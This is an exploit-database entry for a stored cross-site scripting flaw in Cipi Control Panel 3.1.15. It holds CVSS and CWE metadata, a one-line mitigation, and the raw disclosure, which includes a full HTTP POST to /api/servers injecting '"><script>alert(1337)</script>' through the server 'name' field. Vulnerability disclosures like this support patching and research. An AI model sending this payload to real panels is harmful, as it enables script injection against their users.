Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)

vendor:

Cipi Control Panel

by:

Fikrat Ghuliev (Ghuliev)

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Cipi Control Panel

Affected Version From: 3.1.15

Affected Version To: 3.1.15

Patch Exists:

Related CWE:

CPE: a:cipi:cipi_control_panel:3.1.15

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu

2022

Cipi Control Panel 3.1.15 – Stored Cross-Site Scripting (XSS) (Authenticated)

When the user wants to add a new server on the 'Server' panel, in 'name' parameter has not had any filtration. An attacker can inject malicious JavaScript code in the 'name' parameter and execute it when the user visits the page.

Mitigation:

Input validation should be used to prevent XSS attacks. The application should validate all input data and reject any input that contains malicious code.

Source

Exploit-DB raw data:

# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu

When the user wants to add a new server on the "Server" panel, in "name"
parameter has not had any filtration.

POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{
"name":"\"><script>alert(1337)</script>",
"ip":"10.10.10.10",
"provider":"local",
"location":"xss test"
}